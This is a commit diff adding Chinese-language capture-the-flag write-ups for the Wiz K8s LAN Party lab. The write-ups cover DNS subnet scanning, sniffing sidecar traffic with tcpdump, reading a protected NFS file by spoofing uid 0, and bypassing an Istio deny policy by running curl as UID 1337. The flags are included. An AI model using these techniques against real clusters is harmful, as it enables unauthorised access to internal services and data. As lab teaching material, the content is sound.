update

Author: Randark-JMT

docs/Independent-Environment/Fengtaisec/_category_.json

@@ -0,0 +1,8 @@
+{
+    "label": "纵横网络靶场",
+    "link": {
+        "type": "generated-index",
+        "title": "纵横网络靶场",
+        "slug": "/category/Fengtaisec"
+    }
+}

docs/Independent-Environment/Fengtaisec/index.md

@@ -0,0 +1,71 @@
+# Recon
+
+:::note
+
+DNSing with the stars
+
+You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.
+
+As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have "loaded your machine with dnscan to ease this process for further challenges.
+
+All the flags in the challenge follow the same format: `wiz_k8s_lan_party{*}`
+
+你已经获得了对页面底部一个受侵的 Kubernetes Pod 的 shell 访问权限，接下来的目标是进一步攻破其他内部服务。
+
+作为热身，利用 DNS 扫描来发现隐藏的内部服务并获取 flag。为了帮助你完成后续挑战，我们已经在你的机器上预装了 `dnscan` 工具，以简化这一过程。
+
+本次挑战中的所有旗标（flag）都遵循相同的格式：`wiz_k8s_lan_party{*}`
+
+:::
+
+在题目提示中，已经说明环境中预装了 `dnscan` 工具，那么先探测一下环境信息
+
+```shell
+player@wiz-k8s-lan-party:~$ env
+KUBERNETES_SERVICE_PORT_HTTPS=443
+KUBERNETES_SERVICE_PORT=443
+USER_ID=39b58ad9-f423-4cd1-a31e-c76545775452
+HISTSIZE=2048
+PWD=/home/player
+HOME=/home/player
+KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
+HISTFILE=/home/player/.bash_history
+TMPDIR=/tmp
+TERM=xterm-256color
+SHLVL=1
+KUBERNETES_PORT_443_TCP_PROTO=tcp
+KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
+KUBERNETES_SERVICE_HOST=10.100.0.1
+KUBERNETES_PORT=tcp://10.100.0.1:443
+KUBERNETES_PORT_443_TCP_PORT=443
+HISTFILESIZE=2048
+_=/usr/bin/env
+
+player@wiz-k8s-lan-party:~$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
+k8s-lan-party
+```
+
+在环境变量信息中，可以得知 Kubernetes 集群的 HOST 为 `10.100.0.1`
+
+那么直接执行扫描
+
+```shell
+player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
+34984 / 65536 [----------------------------------------------------------------------------------->________________________________________________________________________] 53.38% 963 p/s
+10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
+65365 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------------------------->] 99.74% 963 p/s
+10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
+```
+
+得到了一个地址之后，尝试与其进行交互
+
+```shell
+player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local
+wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}
+```
+
+即可得到答案
+
+```flag
+wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}
+```

docs/Independent-Environment/K8sLanParty/1.md

@@ -0,0 +1,73 @@
+# Finding Neighbours
+
+:::note
+
+Hello?
+
+Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
+
+有时，看起来我们似乎是周围唯一的存在，但我们应该始终警惕那些隐形的 sidecar，它们可能会泄露敏感的秘密。
+
+:::
+
+查看当前的网络连接
+
+```shell
+player@wiz-k8s-lan-party:~$ netstat -anopt
+Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
+tcp        0      0 192.168.1.39:42882      10.100.171.123:80       TIME_WAIT   -                    timewait (58.43/0/0)
+tcp        0      0 192.168.1.39:42870      10.100.171.123:80       TIME_WAIT   -                    timewait (53.42/0/0)
+```
+
+可以看到，有向 `10.100.171.123:80` 发起的连接，但是在本容器内无法得知运行的进程信息
+
+那么结合题目描述，可以猜测是 `sidecar` 容器发起的网络连接，尝试使用 `tcpdump` 捕获连接中的数据
+
+```shell
+player@wiz-k8s-lan-party:~$ tcpdump dst host 10.100.171.123 and dst port 80 -A
+tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
+listening on ns-eafe9b, link-type EN10MB (Ethernet), snapshot length 262144 bytes
+07:29:35.482799 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [S], seq 513025098, win 64240, options [mss 1460,sackOK,TS val 2483130223 ecr 0,nop,wscale 7], length 0
+E..<.n@........'
+d.{...P..$J........w..........
+...o........
+07:29:35.482839 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 1811249520, win 502, options [nop,nop,TS val 2483130223 ecr 2391605501], length 0
+E..4.o@........'
+d.{...P..$Kk.yp....w......
+...o....
+07:29:35.482878 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [P.], seq 0:214, ack 1, win 502, options [nop,nop,TS val 2483130223 ecr 2391605501], length 214: HTTP: POST / HTTP/1.1
+E..
+.p@........'
+d.{...P..$Kk.yp....x......
+...o....POST / HTTP/1.1
+Host: reporting-service
+User-Agent: curl/7.64.0
+Accept: */*
+Content-Length: 63
+Content-Type: application/x-www-form-urlencoded
+
+wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}
+07:29:35.484560 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 206, win 501, options [nop,nop,TS val 2483130224 ecr 2391605502], length 0
+E..4.q@........'
+d.{...P..%!k.z=....w......
+...p....
+07:29:35.484662 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [F.], seq 214, ack 206, win 501, options [nop,nop,TS val 2483130225 ecr 2391605502], length 0
+E..4.r@........'
+d.{...P..%!k.z=....w......
+...q....
+07:29:35.484701 IP 192.168.1.39.44170 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 207, win 501, options [nop,nop,TS val 2483130225 ecr 2391605503], length 0
+E..4.s@........'
+d.{...P..%"k.z>....w......
+...q....
+^C
+6 packets captured
+6 packets received by filter
+0 packets dropped by kernel
+```
+
+即可得到答案
+
+```flag
+wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}
+```

docs/Independent-Environment/K8sLanParty/2.md

@@ -0,0 +1,77 @@
+# Data Leakage
+
+:::note
+
+Exposed File Share
+
+The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️.
+
+目标的大型公司在生产环境中使用了过时但仍受云支持的数据存储技术。天啊，这项技术是在一个访问控制仅基于网络的时代引入的 🤦‍️。
+
+:::
+
+根据题目描述，可以确定其所描述的技术是 `nfs`
+
+分析 `nfs` 的话，就先看目前容器内的挂载情况
+
+```shell
+player@wiz-k8s-lan-party:~$ mount
+overlay on / type overlay (ro,nosuid,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1459/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1458/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1457/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1456/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1455/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1454/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1453/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1452/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1451/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1450/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1449/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1448/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1447/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1446/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1445/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1444/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1443/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1442/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/work)
+overlay on /home/player type overlay (rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1459/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1458/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1457/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1456/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1455/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1454/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1453/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1452/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1451/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1450/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1449/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1448/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1447/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1446/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1445/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1444/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1443/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1442/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/work)
+overlay on /tmp type overlay (rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1459/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1458/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1457/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1456/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1455/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1454/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1453/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1452/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1451/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1450/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1449/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1448/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1447/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1446/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1445/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1444/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1443/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1442/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/work)
+fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.7.163,local_lock=none,addr=192.168.1.244)
+overlay on /etc/resolv.conf type overlay (ro,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1459/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1458/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1457/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1456/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1455/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1454/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1453/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1452/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1451/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1450/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1449/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1448/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1447/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1446/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1445/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1444/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1443/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/1442/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/111664/work)
+tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime,size=62022172k)
+tmpfs on /dev/null type tmpfs (rw,nosuid,size=65536k,mode=755)
+tmpfs on /dev/urandom type tmpfs (rw,nosuid,size=65536k,mode=755)
+none on /proc type proc (ro,relatime)
+```
+
+排查其中的 `nfs` 关键词
+
+```shell
+player@wiz-k8s-lan-party:~$ mount | grep nfs
+fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.7.163,local_lock=none,addr=192.168.1.244)
+```
+
+可以看到，挂载到了 `/efs` 目录下
+
+```shell
+player@wiz-k8s-lan-party:~$ cd /efs/
+player@wiz-k8s-lan-party:/efs$ ls -laih
+total 8.0K
+1546425800678735613 drwxr-xr-x 2 root   root   6.0K Mar 11  2024 .
+          118391922 drwxr-xr-x 1 player player   51 Dec  8 18:27 ..
+8685775981290835117 ---------- 1 daemon daemon   73 Mar 11  2024 flag.txt
+```
+
+可以看到，目前状态下对 `/efs/flag.txt` 文件是没有读取权限的，那么可以尝试从 `nfs` 下手
+
+```shell
+player@wiz-k8s-lan-party:/efs$ nfs-ls "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/?version=4&uid=0&gid=0"
+----------  1     1     1           73 flag.txt
+```
+
+:::warning
+
+如果不带上参数进行访问的话，会得到
+
+```shell
+player@wiz-k8s-lan-party:/efs$ nfs-ls "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/"
+Failed to mount nfs share : mount_cb: nfs_service failed
+```
+
+:::
+
+得知位置之后，就可以查看文件内容了
+
+```shell
+player@wiz-k8s-lan-party:/efs$ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0&gid=0'
+wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}
+```
+
+即可得到答案
+
+```shell
+wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}
+```

docs/Independent-Environment/K8sLanParty/3.md

@@ -0,0 +1,96 @@
+# Bypassing Boundaries
+
+:::note
+
+The Beauty and The Ist
+
+Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don't abuse this power; use it responsibly and with caution.
+
+显然，新的服务网格技术对超高级用户（root 用户）具有独特的吸引力。不要滥用这种能力；请负责任且谨慎地使用它。
+
+:::
+
+既然题目说了，对超高级用户有吸引力，那么先查看用户状态
+
+```plaintext title="/etc/passwd"
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
+_rpc:x:102:65534::/run/rpcbind:/usr/sbin/nologin
+statd:x:103:65534::/var/lib/nfs:/usr/sbin/nologin
+istio:x:1337:1337::/home/istio:/bin/sh
+player:x:1001:1001::/home/player:/bin/sh
+```
+
+同时，题目给了一份策略
+
+```yaml
+apiVersion: security.istio.io/v1beta1
+kind: AuthorizationPolicy
+metadata:
+  name: istio-get-flag
+  namespace: k8s-lan-party
+spec:
+  action: DENY
+  selector:
+    matchLabels:
+      app: "{flag-pod-name}"
+  rules:
+  - from:
+    - source:
+        namespaces: ["k8s-lan-party"]
+    to:
+    - operation:
+        methods: ["POST", "GET"]
+```
+
+可以看到，被限制了通过 GET 和 POST 来访问服务
+
+先探测一下服务地址
+
+```shell
+root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.0/16
+57435 / 65536 [---------------------------------------------------------------------------------------------------------------------------------------->___________________] 87.64% 946 p/s
+10.100.224.159 istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
+65398 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------------------------->] 99.79% 949 p/s
+10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
+65536 / 65536 [-----------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% 953 p/s
+```
+
+尝试进行访问
+
+```shell
+root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
+RBAC: access denied
+```
+
+针对 `istio` 设立的限制，可以使用 UID 为 `1337` 的用户来绕过限制，即可以使用 `istio` 这个用户来发起请求
+
+```shell
+root@wiz-k8s-lan-party:~# su - istio -c 'curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local'
+su: warning: cannot change directory to /home/istio: No such file or directory
+wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}
+```
+
+即可得到答案
+
+```flag
+wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}
+```